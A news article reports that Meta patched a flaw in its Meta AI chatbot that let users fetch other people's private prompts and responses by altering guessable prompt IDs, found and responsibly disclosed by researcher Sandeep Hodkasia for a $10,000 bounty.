Meta Fixes Security Flaw That Exposed Private AI Prompts and Responses

Meta Fixes Security Flaw That Exposed Private AI Prompts and Responses

Meta has patched a significant security vulnerability in its AI chatbot platform that allowed users to access private prompts and responses belonging to other users. The bug, discovered in late 2024, has since been resolved, with Meta confirming there is no evidence it was exploited maliciously.

Security researcher Sandeep Hodkasia, founder of AppSecure, uncovered the flaw and reported it to Meta on December 26, 2024. In recognition of his responsible disclosure, Meta awarded him a $10,000 bug bounty. According to Hodkasia, the issue was resolved on January 24, 2025.

The vulnerability was related to how Meta AI lets users edit their prompts to regenerate responses. Hodkasia explained that during this editing process, Meta’s backend assigned a unique identifier to each prompt and its associated AI output. By inspecting the browser’s network activity, Hodkasia discovered he could manually alter the prompt ID, and in doing so, retrieve someone else’s prompt and AI-generated content.

“The prompt numbers generated by Meta’s servers were ‘easily guessable,’” Hodkasia told TechCrunch, suggesting that a bad actor could automate the process to scrape private data by rapidly cycling through prompt IDs.

This lapse in access control meant Meta’s servers were failing to verify whether the person requesting the data had the appropriate permissions. Such a flaw posed serious privacy risks, especially for a tool designed to generate text and images based on potentially sensitive user input.

Meta confirmed the bug had been fixed and reiterated that no abuse had been detected. “We found no evidence of abuse and rewarded the researcher,” Meta spokesperson Ryan Daniels told TechCrunch.

The issue comes at a time when major tech companies are accelerating the rollout of AI-powered tools, sometimes ahead of robust privacy and security measures. Meta AI, which launched its standalone chatbot earlier this year to rival platforms like ChatGPT, has already faced challenges, including users unintentionally making private conversations public.

As companies race to enhance and expand AI offerings, this incident highlights the importance of thorough security testing and responsible disclosure practices in safeguarding user data.

 

- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles

error: Content is protected !!

Share your details to download the Cybersecurity Report 2025

Share your details to download the CISO Handbook 2025

Sign Up for CXO Digital Pulse Newsletters

Share your details to download the Research Report

Share your details to download the Coffee Table Book

Share your details to download the Vision 2023 Research Report

Download 8 Key Insights for Manufacturing for 2023 Report

Sign Up for CISO Handbook 2023

Download India’s Cybersecurity Outlook 2023 Report

Unlock Exclusive Insights: Access the article

Download CIO VISION 2024 Report

Share your details to download the report

Share your details to download the CISO Handbook 2024

Fill your details to Watch